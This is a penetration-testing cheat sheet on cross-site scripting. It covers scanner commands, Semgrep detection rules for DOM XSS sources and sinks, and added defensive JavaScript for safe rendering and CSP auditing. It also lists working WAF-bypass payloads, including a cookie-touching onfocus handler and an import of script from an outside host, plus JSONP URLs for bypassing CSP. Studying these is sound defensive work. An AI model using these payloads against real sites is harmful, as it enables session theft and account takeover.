caon.io

XSS

# https://github.com/hahwul/dalfox
dalfox url http://example.com
cat urls | dalfox pipe -  --skip-bav --skip-mining-all

Find reflected parameters that could lead to XSS with Gxss

# https://github.com/KathanP19/Gxss
cat list | Gxss -c 100 -p REPLACE_STRING

Semgrep

Semgrep can be used to detect sources and sinks and assist in XSS detection.

Usage

Download JavaScript files and beautify them (See Javascript), then run Semgrep with

semgrep -c xss.yaml scripts/*

Hold down!

JavaScript files must be beautified, otherwise Semgrep will not work properly.

Pattern-based rule (matches any of the listed expressions on its own):

rules:
  - id: domxss-insertAdjacentHTML
    languages:
      - javascript
      - typescript
    message: Found dangerous HTML output
    pattern-either:
      - pattern: document.location.search = ...
      - pattern: document.location.hash = ...
      - pattern: document.location.pathname = ...
      - pattern: window.location.search = ...
      - pattern: window.location.hash = ...
      - pattern: window.location.pathname = ...
      - pattern: document.URL = ...
      - pattern: document.documentURI = ...
      - pattern: document.baseURI = ...
      - pattern: document.cookie = ...
      - pattern: document.referrer = ...
      - pattern: $X.insertAdjacentHTML(...)
      - pattern: $X.innerHTML(...)
      - pattern: $X.innerHTML = ...
      - pattern: eval(...)
      - pattern: execScript
      - pattern: script.src = ...
      - pattern: iframe.src = ...
      - pattern: document.location = ...
      - pattern: window.location = ...
      - pattern: document.location.href = ...
      - pattern: window.location.href = ...
      - pattern: document.write(...)
      - pattern: document.writeln(...)
      - pattern: $X.outerHTML = ...
      - pattern: $X.outerHTML(...)
    severity: WARNING

Taint-mode rule (a separate rule file; it only reports when a value from one of the sources flows into one of the sinks):

rules:
  - id: domxss-insertAdjacentHTML
    languages:
      - javascript
      - typescript
    message: Found dangerous HTML output
    mode: taint
    pattern-sources:
      - pattern: document.location.search
      - pattern: document.location.hash
      - pattern: document.location.pathname
      - pattern: document.location.href
      - pattern: document.location
      - pattern: window.location
      - pattern: window.location.href
      - pattern: window.location.search
      - pattern: window.location.hash
      - pattern: window.location.pathname
      - pattern: document.URL
      - pattern: document.documentURI
      - pattern: document.baseURI
      - pattern: document.cookie
      - pattern: document.referrer
    pattern-sinks:
      - pattern: $X.insertAdjacentHTML(...)
      - pattern: $X.innerHTML(...)
      - pattern: $X.innerHTML = ...
      - pattern: eval(...)
      - pattern: execScript
      - pattern: script.src = ...
      - pattern: iframe.src = ...
      - pattern: document.location = ...
      - pattern: window.location = ...
      - pattern: document.location.href = ...
      - pattern: window.location.href = ...
      - pattern: document.write(...)
      - pattern: document.writeln(...)
      - pattern: $X.outerHTML = ...
      - pattern: $X.outerHTML(...)
    severity: WARNING
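The kind of code the taint rule above reports, next to a hardened version of the same feature, as an added example that is not part of the original page: a fragment read from `location.hash` (a listed source) is written to `innerHTML` (a listed sink), then the same rendering is done through `textContent`, with an HTML escaper for cases where markup must be built from strings and a URL check for the `location = ...` sinks. The `fakeElement` stand-in, the `example.test` host and the `allowedHosts` parameter are assumptions made so the code runs under Node without a browser.

```javascript
// Added example, not code from the page: the source-to-sink flow the taint
// rule reports, beside a hardened version. A tiny stand-in for a DOM element
// is constructed so this runs under Node (in a browser you would pass a real
// element).

function fakeElement() {
  return { innerHTML: "", textContent: "" };
}

// Vulnerable: location.hash (a source in the rule) reaches innerHTML (a sink).
function renderNameUnsafe(el, hash) {
  const name = decodeURIComponent(hash.replace(/^#/, ""));
  el.innerHTML = "Hello, " + name; // matches the rule's `$X.innerHTML = ...` sink
  return el.innerHTML;
}

// Hardened: the same value assigned through textContent is rendered as text,
// so any markup in the fragment is never parsed.
function renderNameSafe(el, hash) {
  const name = decodeURIComponent(hash.replace(/^#/, ""));
  el.textContent = "Hello, " + name;
  return el.textContent;
}

// When a string really must become markup, escape every untrusted piece first.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened redirect for the `location = ...` sinks: only http(s) URLs on an
// allowlisted host are returned; anything else (javascript:, data:, a foreign
// host reached via a scheme-relative "//host" path) yields null and the caller
// must not navigate. `allowedHosts` and the base origin are assumptions.
function safeRedirectTarget(candidate, allowedHosts, base = "https://example.test/") {
  let url;
  try {
    url = new URL(candidate, base);
  } catch (e) {
    return null; // unparsable input is rejected rather than passed through
  }
  if (url.protocol !== "https:" && url.protocol !== "http:") return null;
  if (!allowedHosts.includes(url.hostname)) return null;
  return url.href;
}
```

Run against the Semgrep rule, only `renderNameUnsafe` is reported: the source and sink are the same in both functions, but `textContent` is not in `pattern-sinks`.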

Markdown

Markdown parsers can lead to XSS.

Bypass

alert(1) would become ale\u{72}t(1\x29, where the escape sequences decode as:

\u{72} -> r
\x29 -> )
\u003e -> >
\u003c -> <

WAF Bypass

<a/\test="%26quot"href=%27javascript:/**/;\ale\u{72}t(11111\x29");%27>Click
<a/\test="%26quot;x%26quot;"href=%27javascript:/**/;location.assign("google.com")%27>Click</a>
<input/\x3e/autofocus/onfocus=[document['cookie']].findIndex(alert)>

import('//X55.is')
(function(x){this[x+`ert`](1)})`al`
window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)
document['default'+'View'][`\u0061lert`](3)
parent[/al/.source+/ert/.source](1) //without spaces and quotes
parent[/al/.source.concat(/ert/.source)](2) //without spaces, quotes, + sign
alert;throw 1
alert`1`

Encoding

CSP Bypass

If the site's CSP has Google whitelisted, the following could be used:

www.google.com/complete/search?client=chrome&q=1&jsonp=alert(1)//
accounts.google.com/o/oauth2/revoke?callback=alert(1)
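The corresponding defensive check, as an added example that is not part of the original page: an auditor that parses a Content-Security-Policy header and flags `script-src` entries that allow a whole host, since any JSONP endpoint on such a host (like the two above) loads under that policy, next to the nonce-based form that does not rely on a host allowlist. The two sample policies are constructed, and `RANDOM_PER_RESPONSE` is a placeholder for a fresh per-response nonce.

```javascript
// Added example, not code from the page: audit the script-src of a CSP header
// for allowlist entries that admit JSONP-style bypasses.

// Split "dir1 v v; dir2 v" into a Map of directive name -> source list.
function parseCsp(header) {
  const directives = new Map();
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    directives.set(tokens[0].toLowerCase(), tokens.slice(1));
  }
  return directives;
}

// Returns a list of findings (empty means no weakness this check knows about).
function auditScriptSrc(header) {
  const d = parseCsp(header);
  const sources = d.get("script-src") || d.get("default-src");
  if (!sources) return ["no script-src or default-src: script loading is unrestricted"];

  const findings = [];
  const hasNonceOrHash = sources.some((s) => /^'(nonce-|sha(256|384|512)-)/.test(s));
  const strictDynamic = sources.includes("'strict-dynamic'");

  for (const s of sources) {
    // 'unsafe-inline' is ignored by browsers once a nonce or hash is present.
    if (s === "'unsafe-inline'" && !hasNonceOrHash) findings.push("'unsafe-inline' allows inline scripts");
    if (s === "'unsafe-eval'") findings.push("'unsafe-eval' allows eval()");
    if (s.startsWith("'")) continue; // 'self', nonces, hashes, 'strict-dynamic'
    // Under 'strict-dynamic', host and scheme sources are ignored, so they are
    // only legacy fallbacks and not part of the effective allowlist.
    if (strictDynamic) continue;
    if (s === "*" || /^[a-z][a-z0-9+.-]*:$/i.test(s)) {
      findings.push(`${s}: any URL with that scheme is allowed`);
      continue;
    }
    const hostPart = s.replace(/^[a-z][a-z0-9+.-]*:\/\//i, "");
    if (hostPart.includes("*")) {
      findings.push(`${s}: wildcard host`);
    } else if (!hostPart.includes("/")) {
      // A bare host allows every script it serves, including JSONP endpoints
      // that echo a caller-chosen callback name into the response.
      findings.push(`${s}: whole host allowed; any JSONP endpoint on it bypasses the policy`);
    }
  }
  return findings;
}

// Constructed sample policies: the weak allowlist form and the nonce-based form.
const WEAK_POLICY =
  "default-src 'self'; script-src 'self' https://www.google.com https://accounts.google.com 'unsafe-inline'";
const STRICT_POLICY =
  "script-src 'nonce-RANDOM_PER_RESPONSE' 'strict-dynamic' https: 'unsafe-inline'; object-src 'none'; base-uri 'none'";
```

`auditScriptSrc(WEAK_POLICY)` reports both Google hosts and the `'unsafe-inline'` keyword, while `auditScriptSrc(STRICT_POLICY)` reports nothing: the `https:` and `'unsafe-inline'` entries in the strict policy are fallbacks that modern browsers ignore in the presence of the nonce and `'strict-dynamic'`, so no host allowlist remains for a JSONP endpoint to slip through.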

Cool resources